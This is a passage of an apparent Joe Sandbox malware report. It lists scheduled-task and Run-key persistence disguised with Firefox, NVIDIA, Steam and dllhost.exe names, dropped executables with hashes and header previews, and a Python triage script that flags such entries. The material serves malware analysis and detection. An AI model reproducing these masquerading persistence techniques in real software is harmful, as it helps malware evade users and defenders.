20:46:23 | Task Scheduler | Run new task: MicrosoftApi path: "C:\Users\user\AppData\Roaming\ServiceApi\MicrosoftApi.exe"
20:46:31 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\setup_s.exe

The "Sleep call ... modified" rows record the sandbox shortening Sleep() delays to defeat time-based evasion; the remaining rows are persistence. Every persistence target sits under %APPDATA%: the two scheduled tasks borrow the name of Mozilla's legitimate "Firefox Default Browser Agent <hash>" task but run extension-less files in randomly named folders, and the Run values use vendor-sounding names (Steam, NVIDIA, Driver) with dllhost.exe, a Windows system binary name, placed outside System32.
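The three traits just described (user-writable path, system-binary name outside its system directory, vendor task name with a foreign action) can be checked mechanically over Run values and scheduled-task actions. The following is an added example, not code from the Joe Sandbox report or from any of the detected families: the sample entries are transcribed from the table above, the legitimate Firefox task and the OneDrive value are constructed controls, and the vendor and system-binary lists are assumptions rather than data from this report.

```python
"""Triage autostart entries the way the Behavior table above is read by hand.

Added example, not part of the Joe Sandbox report. Sample entries are
transcribed from the report; the two controls at the end and the vendor /
system-binary tables are assumptions.
"""
from __future__ import annotations

from dataclasses import dataclass
from pathlib import PureWindowsPath

# Image names that belong in %SystemRoot%\System32 or SysWOW64 (assumption).
SYSTEM_BINARIES = {"dllhost.exe", "svchost.exe", "rundll32.exe", "explorer.exe", "conhost.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# Task-name prefixes used by legitimate vendors and where their action normally
# lives (assumed install path of Firefox's default-browser-agent).
VENDOR_TASKS = {"firefox default browser agent": "c:\\program files\\mozilla firefox\\"}


@dataclass(frozen=True)
class Autostart:
    kind: str      # "run_key" or "task"
    name: str      # Run value name or task name
    command: str   # Run value data or task action, as written in the registry/task


def image_path(command: str) -> str:
    """Pull the executable path out of a command line (heuristic: a quoted
    path, else everything up to the first '.exe', else the whole string)."""
    cmd = command.strip().lower()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    idx = cmd.find(".exe")
    return cmd[: idx + 4] if idx >= 0 else cmd


def findings(entry: Autostart) -> list[str]:
    """Reasons this entry looks like malware persistence; empty list if none."""
    path = image_path(entry.command)
    image = PureWindowsPath(path).name
    reasons = []
    if "\\appdata\\" in path or "\\temp\\" in path:
        reasons.append("runs from a user-writable profile directory")
    if image in SYSTEM_BINARIES and not path.startswith(SYSTEM_DIRS):
        reasons.append(f"{image} is a Windows system binary name outside System32/SysWOW64")
    if entry.kind == "task":
        for prefix, home in VENDOR_TASKS.items():
            if entry.name.lower().startswith(prefix) and not path.startswith(home):
                reasons.append(f"task name mimics '{prefix}' but its action is not under {home}")
    return reasons


def triage(entries: list[Autostart]) -> dict[str, list[str]]:
    """Map 'kind:name' to its findings, keeping only flagged entries."""
    return {f"{e.kind}:{e.name}": r for e in entries if (r := findings(e))}


# Transcribed from the Behavior and APIs table above, plus two constructed controls.
SAMPLE_ENTRIES = [
    Autostart("task", "Firefox Default Browser Agent F2CB121A05C12497", r"C:\Users\user\AppData\Roaming\adiicvb"),
    Autostart("task", "Firefox Default Browser Agent ECF4A541FD40CD6B", r"C:\Users\user\AppData\Roaming\vsiicvb"),
    Autostart("run_key", "Steam", r"C:\Users\user\AppData\Roaming\NVIDIA\dllhost.exe"),
    Autostart("run_key", "Driver", r"C:\Users\user\AppData\Roaming\Sysfiles\setup_s.exe"),
    Autostart("task", "MicrosoftApi", r'"C:\Users\user\AppData\Roaming\ServiceApi\MicrosoftApi.exe"'),
    # Constructed controls with assumed legitimate layouts (not from the report):
    Autostart("task", "Firefox Default Browser Agent 308046B0AF4A39CB",
              r"C:\Program Files\Mozilla Firefox\default-browser-agent.exe do-task"),
    Autostart("run_key", "OneDrive", r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
]

if __name__ == "__main__":
    for key, reasons in triage(SAMPLE_ENTRIES).items():
        print(key, "->", "; ".join(reasons))
```

The OneDrive control is deliberately included: per-user installers (OneDrive, Teams, Discord) also run from AppData, so the path rule on its own is a lead, not a verdict. The two signals that separate this sample's entries from such installers are the stacked reasons: a system-binary name in the wrong directory, and a vendor task name whose action points away from the vendor's install path.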

                                                                              Joe Sandbox View / Context

                                                                              IPs

                                                                              No context

                                                                              Domains

                                                                              No context

                                                                              ASN

                                                                              No context

                                                                              JA3 Fingerprints

                                                                              No context

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\768F.exe.log
Process: C:\Users\user\AppData\Local\Temp\768F.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 700
Entropy (8bit): 5.346524082657112
Encrypted: false
                                                                              SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
                                                                              MD5:65CF801545098D915A06D8318D296A01
                                                                              SHA1:456149D5142C75C4CF74D4A11FF400F68315EBD0
                                                                              SHA-256:32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
                                                                              SHA-512:4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
Malicious: false
Reputation: unknown
Note: this CLR usage log shows that 768F.exe is a .NET Framework 4 assembly and that it loaded System, System.Core, Microsoft.CSharp, System.Dynamic and System.Windows.Forms (see the Preview below).
                                                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
C:\Users\user\AppData\Local\Temp\1365.exe
Process: C:\Windows\explorer.exe
File Type: MS-DOS executable
Category: dropped
Size (bytes): 1335968
Entropy (8bit): 6.778646938974583
Encrypted: false
                                                                              SSDEEP:12288:N4U4W7eu98+Xl4U4APyIrgyBc1mb8FyV30JBOTfGdHOoT1VP9SLyJPdQSgyR5daq:7P98+IIrgyv8Fs3UQyHRT1V8yJ1n
                                                                              MD5:DC36EBFC2796806A965589566C81E2A1
                                                                              SHA1:787EBB01105FF61A080631C977ACB05D94A021A7
                                                                              SHA-256:2B3DF46D7DD8E09722E98CF695137DDEDDE0BED7C32BE8A5495E915A5C24B3A4
                                                                              SHA-512:D5607CF8FA2AB926FE88FE09C11B8111003DEE3AC23F8D504A5FE5E326E91C743BA6618D34860536CC32E7541ED172C841C34C8567D68B865833593A803387AC
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown
                                                                              Preview: MZ.....o...g.'.:.(3...32.....f.....C'B{b.........+..R...d:.....Q..............................................................................................................................................................................................PE..L.....)...............0......d........... ... ....@..........................`............@..................................@.......P...a...........................................................................................................rdata...0.............................`.reloc.......@......................@....rsrc....a...P...a..................@..@.edata...............h..............@.......................................................................................................................................................................................................................................................................................................................!..g.Q7f.Qw.ZY*A..l..Hl.~.
C:\Users\user\AppData\Local\Temp\28B3.exe
Process: C:\Windows\explorer.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1644445
Entropy (8bit): 6.818331097494587
Encrypted: false
                                                                              SSDEEP:24576:UDWHSb4N70TeyTzBXNlYSqA8AkNVg+6FRiwJliF4HCZ/LgRQ7jyc+HThm:v84eJ3Y+VkQ3tiFbl/sHtm
                                                                              MD5:B5536B068BB1098A1030F8C7DF17BFD2
                                                                              SHA1:4EC1F5A928376D3EBEF25CD703F9E17C715BEB1D
                                                                              SHA-256:53323C03A3B0411F3C9C7F4D13866BC6E79AD0BCDFB4416E51C5CB08AFBD65E1
                                                                              SHA-512:33FCCC6A74ADA26DD34B97696298263AD7E69A8800B839B6A5BDB8E23C8ACAC5274AE500388AA2C1C198EF28C4CF5EFC63180A7807C73A079EEC620C220967C0
Malicious: false
Reputation: unknown
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...+...._......._..'...._f.'...._..'...Rich&...........PE..L.....`.....................................0....@..........................@............@.........................0...4...d...<....0..........................|"......T............................U..@............0..`...... ....................text............................... ..`.rdata.."....0......................@..@.data...(7..........................@....didat....... ......................@....rsrc........0......................@..@.reloc..|".......$..................@..B................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\2941.exe
Process: C:\Windows\explorer.exe
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 357376
Entropy (8bit): 7.849252713888167
Encrypted: false
                                                                              SSDEEP:6144:D5aWbksiNTB6534zpo1j22P5Qvs4iiOBk2m65O3UlNwA9ju99Hm:D5atNT85AMevs4iPC2m6eoNwA9jujHm
                                                                              MD5:5263F286E45A03C8309FC8BB49E0F19A
                                                                              SHA1:A351CBD1C56F74115473C831442588653351231D
                                                                              SHA-256:83AE57BDC0F817111AB909F54EC0F33B84F6504596D2A55ADF39A16C5CF1AFC0
                                                                              SHA-512:E00F2ADB5BDF172D73006A0D813FA4FDAF60F1900297A43393E9EFC7C1187747E62BABF6FF9DDAFD019ECF306184B94FB1332313F00037F8DCE447C41159C4F3
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....usZ...............2.....^...............0....@.........................................................................lq..........P...........................................................................pt..<............................code...~8.......:.................. ..`.text...B....P.......>.............. ..`.rdata...3...0...4..................@..@.data........p.......J..............@....rsrc...P............\..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Local\Temp\2D5.exe
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):752128
                                                                              Entropy (8bit):7.235022431975566
                                                                              Encrypted:false
                                                                              SSDEEP:12288:3WRxXhNF7PqC3t3agQ1DKoYf7Bz6q3MS0jLTESBr6MrIWc8unn:3WRZPJqq3aFtvYf7R6q3AB+Iu/
                                                                              MD5:C388DB9CA136D19310B76EF81E54FC12
                                                                              SHA1:EDCC614B7A82D45ABCD7CF6A4A320E96EBF74194
                                                                              SHA-256:BCDCAF81B3D7D4434C2A0CAF687317A8B641D0A7F6B32A9130E4CCBF289D2EB6
                                                                              SHA-512:C7C381654AEA4F294F44FB3D889CC633D03B9BA925BD0F570DE35E3A5F051720D178CF87C0B11EE722BB144CF6C61419BFEC4F4DF64ADC8076BFDE01B69EF07B
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Reputation:unknown
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~...-...-...-..{-...-..m-...-..j-...-.@.-...-...-...-..d-...-..z-...-...-...-Rich...-................PE..L...,3R`.....................................0....@.................................JU.......................................]..P....0..P............................1...............................P..@............0...............................text...#........................... ..`.rdata..b7...0...8..................@..@.data...8....p...X...T..............@....rsrc...P]...0......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Local\Temp\4ED.exe
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):615936
                                                                              Entropy (8bit):6.41244177881293
                                                                              Encrypted:false
                                                                              SSDEEP:12288:fILn6MEfztqUnUxs9iIoDyJRj86dMDexWcAch4tUTc6SDhVqkJZ9:fcJEhqW6UiIouJRj8qMDeccFh4ec7h4a
                                                                              MD5:7FE15A5F306240209441F528BE0F5783
                                                                              SHA1:8B346B7E81859D79EB29CF9C6B7FDA7C1A80D85E
                                                                              SHA-256:0C96D2A002820008CD17AAFBE1806A31EFDB3D37D5B2E6731C3AD8DDD4576812
                                                                              SHA-512:8AC50266684DF2D56BBAFB645E9B1C292E043C3F35AD59266F41C14DBCEEBAE20ADC72A7F8726D6C0074CB12D3CF9D4A3DBB6AD18212D6CAEC35742C94FF706B
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......>X.$z9.wz9.wz9.wnR.vw9.wnR.v.9.wnR.vl9.w(L.vk9.w(L.vn9.w(L.v09.wnR.v.9.wz9.w.9.w.L.v{9.w.L.w{9.w.L.v{9.wRichz9.w........................PE..L...}..a.............................j............@.......................................@....................................<...............................t......................................@...............X............................text...C........................... ..`.7m512qw.....0...................... ..`.rdata..............................@..@.data...............................@....rsrc...............................@..@.reloc..t............H..............@..B........................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Local\Temp\6902.exe
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):298496
                                                                              Entropy (8bit):5.314843046074087
                                                                              Encrypted:false
                                                                              SSDEEP:3072:XCIFybJzjLXqqsD7pXnoaeMw8PYeoVf2hTHc0eCPWrxpzbgqru:SmmznA7pXcMwcToVOhTRZuzbgwu
                                                                              MD5:F4C254B2556531003266AF2D9D74B625
                                                                              SHA1:6FC8A01CADA67BB4D72C8414CF32FF26D42400D2
                                                                              SHA-256:3DBD6C9F0A3AE1CE1665D72C5404CE9170F1951E02DF3844FA035DCAC966F565
                                                                              SHA-512:45F841C0E3ABA878813E9DE5B8FD0AEB1085F4109F13A6CE2B8F26B03CCEBB9ADD232BCE30F8FAB41E980B78239FB7A8E8BEF46E98A0AF68F2D94E2421012583
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Reputation:unknown
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~...-...-...-..{-...-..m-...-..j-...-.@.-...-...-...-..d-...-..z-...-...-...-Rich...-................PE..L....I.`.....................................0....@.................................`........................................]..P....@..P............................1...............................P..@............0...............................text...#........................... ..`.rdata..b7...0...8..................@..@.data...X....p...l...T..............@....rsrc...P....@......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Local\Temp\768F.exe
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:modified
                                                                              Size (bytes):537088
                                                                              Entropy (8bit):5.840438491186833
                                                                              Encrypted:false
                                                                              SSDEEP:12288:SV2DJxKmQESnLJYydpKDDCrqXSIXcZD0sgbxRo:nK1vVYcZyXSY
                                                                              MD5:D7DF01D8158BFADDC8BA48390E52F355
                                                                              SHA1:7B885368AA9459CE6E88D70F48C2225352FAB6EF
                                                                              SHA-256:4F4D1A2479BA99627B5C2BC648D91F412A7DDDDF4BCA9688C67685C5A8A7078E
                                                                              SHA-512:63F1C903FB868E25CE49D070F02345E1884F06EDEC20C9F8A47158ECB70B9E93AAD47C279A423DB1189C06044EA261446CAE4DB3975075759052D264B020262A
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 67%
                                                                              Reputation:unknown
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?y*...............0..*...........I... ...`....@.. ....................................@.................................`I..K....`............................................................................... ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@....reloc...............0..............@..B.................I......H............?..........hX..}............................................(....*..0..,.......(d...8....*.~....u....s....z&8.........8........................*.......*....(d...(....*...j*.......*.......*.......*.......*....(....*.~(....(^...8....*(.........8........*.......*.......*.......*.......*....0.............*.0.............*....*.......*.......*....(....*..0.............*....*....0.............*.(....z.A.........z.A.......................*.......*.......*.......*.......
                                                                              C:\Users\user\AppData\Local\Temp\76E7.exe
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):312320
                                                                              Entropy (8bit):5.47796974367935
                                                                              Encrypted:false
                                                                              SSDEEP:3072:apFm1bzbdCCqtGJsD7Aga8nrsPgKrGB4Ip6OD3jBaTN1Wrxpzbgqru:apkVdCxr70NPgKrGiM6KEN1uzbgwu
                                                                              MD5:2AE79DF2C51EF858F5483314B6B83FA0
                                                                              SHA1:F7EFA3757E0156C4C999AB4B36F829E664D91A89
                                                                              SHA-256:BC0735065E4789CD3974E454135AC106E5C5129385BC6B938EE7C852238B0000
                                                                              SHA-512:CF2B6144397CE27D1E87A9AED039EF3437F925718D8F6DF2B19AA8614117E0C43F8519B18FFB56A98A7E8B1B770B916F0FA0485DF97135D35DAC4743411A0224
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Reputation:unknown
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~...-...-...-..{-...-..m-...-..j-...-.@.-...-...-...-..d-...-..z-...-...-...-Rich...-................PE..L......_.....................&...............0....@..........................P.......R.......................................]..P.......P............................1...............................P..@............0...............................text...#........................... ..`.rdata..R7...0...8..................@..@.data...x....p.......T..............@....rsrc...P...........................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Local\Temp\7CCD.exe
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):301056
                                                                              Entropy (8bit):5.192330972647351
                                                                              Encrypted:false
                                                                              SSDEEP:3072:4/ls8LAAkcooHqeUolNx8IA0ZU3D80T840yWrxpzbgqruJnfed:Ils8LA/oHbbLAGOfT8auzbgwuJG
                                                                              MD5:277680BD3182EB0940BC356FF4712BEF
                                                                              SHA1:5995AE9D0247036CC6D3EA741E7504C913F1FB76
                                                                              SHA-256:F9F0AAF36F064CDFC25A12663FFA348EB6D923A153F08C7CA9052DCB184B3570
                                                                              SHA-512:0B777D45C50EAE00AD050D3B2A78FA60EB78FE837696A6562007ED628719784655BA13EDCBBEE953F7EEFADE49599EE6D3D23E1C585114D7AECDDDA9AD1D0ECB
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Reputation:unknown
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2t..v.i.v.i.v.i.hG..i.i.hG....i.hG..[.i.Q...q.i.v.h...i.hG..w.i.hG..w.i.hG..w.i.Richv.i.........PE..L.....b_.............................-.......0....@.......................... ...............................................e..P....................................2.............................. Y..@............0...............................text............................... ..`.rdata..D?...0...@..."..............@..@.data...X....p...$...b..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Local\Temp\E6AF.exe
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):590848
                                                                              Entropy (8bit):6.732963553617895
                                                                              Encrypted:false
                                                                              SSDEEP:12288:wZ74qPWaSeXqN5GCJzSilgqJg38oOBPBLunnb:ygfG0ztlg938N0b
                                                                              MD5:27F38096E53A91C525B0700700CEE4C4
                                                                              SHA1:C9D8B68A4E0216A83C44D7208C2D79DA873A48A2
                                                                              SHA-256:A35A1FF0E7EF9F9DFFBDE98157E8FDF0AD0D2C1B081284ACB5CF29623AC79A4F
                                                                              SHA-512:64F26739100990230D01F787048EADD14B6DD424C09C815DB737D71CEE3D89D18ACD4F91DCAF0694592D296AA2387A065E41380A71AD4CCAF841C785112E7587
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Reputation:unknown
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^`.....D...D...D.ScD3..D.SrD...D.SdDf..D=.D...D...D...D.SmD...D.SsD...D.SvD...DRich...D........PE..L...l_.`......................{...................@..........................P|................................................<....P{..............................................................|..@............................................text............................... ..`.rdata.............................@..@.data.....s..........~..............@....rsrc........P{.....................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Local\Temp\FF1A.exe
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):861696
                                                                              Entropy (8bit):7.3318876861748015
                                                                              Encrypted:false
                                                                              SSDEEP:12288:37Ea6v+VoHuIMykls8cGSV/PGK2fSHciRsmBd8VNKkoOezMLgUunnX:t6v+Aqpls8BSVepjUs5NW1HX
                                                                              MD5:C80F38DA2951D491B7EDF24F89235293
                                                                              SHA1:CA1FB05B49651033705CD8F565B745334F6FA1CB
                                                                              SHA-256:D206AC0995D218519A794CBED6686790CE51E0152EB4251EC17A68941CCB26D8
                                                                              SHA-512:576ADECE03EB615C7D0196FAF385437B6B4C37AE6CD7F043C16B331E985B72598F93ABB8B54E8800CAFB75ABB1152D8B907B1DBC5D275FA7D37ACED575F1A443
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Reputation:unknown
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2t..v.i.v.i.v.i.hG..i.i.hG....i.hG..[.i.Q...q.i.v.h...i.hG..w.i.hG..w.i.hG..w.i.Richv.i.........PE..L...{..`.............................-.......0....@.................................dC.......................................e..P....................................2.............................. Y..@............0...............................text............................... ..`.rdata..D?...0...@..."..............@..@.data........p.......b..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Local\Temp\qxoxlxqh.exe
                                                                              Process:C:\Users\user\AppData\Local\Temp\6902.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):13640704
                                                                              Entropy (8bit):6.337419254660324
                                                                              Encrypted:false
                                                                              SSDEEP:24576:2znMVsmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmH:2zA
                                                                              MD5:EAE6D58C8C1CB389453AF3692BF58DA8
                                                                              SHA1:6DEDF0B5CC3DFF0D02350995269C4374073C1465
                                                                              SHA-256:BBBA69A086C733CFF603C78D51AA0ACA281EB390FB83A2F24B1A3CAF88622ECA
                                                                              SHA-512:91D3D989E997BEB5F0FD2845940E40C0657B596E60B88CD41520FA36B9E8749BF9371AB061AD51A6E8AA9750BFA850659FBE2894FA51B37756D1D9EDFE80381A
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Reputation:unknown
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~...-...-...-..{-...-..m-...-..j-...-.@.-...-...-...-..d-...-..z-...-...-...-Rich...-................PE..L....I.`.....................................0....@.................................`........................................]..P....@..P............................1...............................P..@............0...............................text...#........................... ..`.rdata..b7...0...8..................@..@.data...X....p...l...T..............@....rsrc...P....@...d..................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Roaming\adiicvb
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):284672
                                                                              Entropy (8bit):5.038426150867094
                                                                              Encrypted:false
                                                                              SSDEEP:3072:WuIvZ9KEbLnAALxvRs7uCoorI90O3manWxULkIFueWrxpzbgqru:WrPKOnvA7uIrUJY0kIFueuzbgwu
                                                                              MD5:D609A21245D77DCCD6D4A659CBD9466A
                                                                              SHA1:A8775CCB1D6B7B941E5B37D59DB5D25F4B736CF9
                                                                              SHA-256:A0F70F88C9A376E7C0F7E508C796BF1DBBF58FF8B172B9AFF3421BE63E2D7F78
                                                                              SHA-512:771E118945BC4C544312C67E568D0D9BAB8138573D31CB3F4E81626978EB77FA472EB49E84F67E79DA15E45F5C90B8A1BC2EAD9BAFD8B9FCF7B7455F4917D47D
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Reputation:unknown
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~...-...-...-..{-...-..m-...-..j-...-.@.-...-...-...-..d-...-..z-...-...-...-Rich...-................PE..L....qy`.....................................0....@.................................&........................................]..P.......`............................1...............................P..@............0...............................text...#........................... ..`.rdata...7...0...8..................@..@.data....~...p.......T..............@....rsrc...`............r..............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Roaming\adiicvb:Zone.Identifier
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):26
                                                                              Entropy (8bit):3.95006375643621
                                                                              Encrypted:false
                                                                              SSDEEP:3:ggPYV:rPYV
                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                              Malicious:true
                                                                              Reputation:unknown
                                                                              Preview: [ZoneTransfer]....ZoneId=0
                                                                              C:\Users\user\AppData\Roaming\vsiicvb
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):301056
                                                                              Entropy (8bit):5.192330972647351
                                                                              Encrypted:false
                                                                              SSDEEP:3072:4/ls8LAAkcooHqeUolNx8IA0ZU3D80T840yWrxpzbgqruJnfed:Ils8LA/oHbbLAGOfT8auzbgwuJG
                                                                              MD5:277680BD3182EB0940BC356FF4712BEF
                                                                              SHA1:5995AE9D0247036CC6D3EA741E7504C913F1FB76
                                                                              SHA-256:F9F0AAF36F064CDFC25A12663FFA348EB6D923A153F08C7CA9052DCB184B3570
                                                                              SHA-512:0B777D45C50EAE00AD050D3B2A78FA60EB78FE837696A6562007ED628719784655BA13EDCBBEE953F7EEFADE49599EE6D3D23E1C585114D7AECDDDA9AD1D0ECB
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Reputation:unknown
                                                                              C:\Users\user\AppData\Roaming\vtwerfe
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):248375
                                                                              Entropy (8bit):7.999175516196176
                                                                              Encrypted:true
                                                                              SSDEEP:3072:wvDw9/bms3KtQdGJe9QVB7aCCOQcqhLvly486c6kqL++7gIVPl+qTNoF6hvAkh:wLO/6eKCIoO8rcocIaIZMqKF6Ckh
                                                                              MD5:70CAB22CF4C8CA48B404DF25A1EA56FA
                                                                              SHA1:8EF410D86B82AE06997F46FC1C5150C000682F88
                                                                              SHA-256:B891BF63EAA05163E8C22102F25BFB165A8D6861CB25405D1833F59D3922ABE9
                                                                              SHA-512:B4DD40CF612A208D13A26AE2A1BD8FAA8569E2A3FDAFEF712FF8A7B033AACDCC3790EB32F160B49608BCA378473A56288FE2E0C7399B743810D950FA600AFD24
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe (copy)
                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):13640704
                                                                              Entropy (8bit):6.337419254660324
                                                                              Encrypted:false
                                                                              SSDEEP:24576:2znMVsmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmH:2zA
                                                                              MD5:EAE6D58C8C1CB389453AF3692BF58DA8
                                                                              SHA1:6DEDF0B5CC3DFF0D02350995269C4374073C1465
                                                                              SHA-256:BBBA69A086C733CFF603C78D51AA0ACA281EB390FB83A2F24B1A3CAF88622ECA
                                                                              SHA-512:91D3D989E997BEB5F0FD2845940E40C0657B596E60B88CD41520FA36B9E8749BF9371AB061AD51A6E8AA9750BFA850659FBE2894FA51B37756D1D9EDFE80381A
                                                                              Malicious:true
                                                                              Reputation:unknown
                                                                              \Device\ConDrv
                                                                              Process:C:\Windows\SysWOW64\netsh.exe
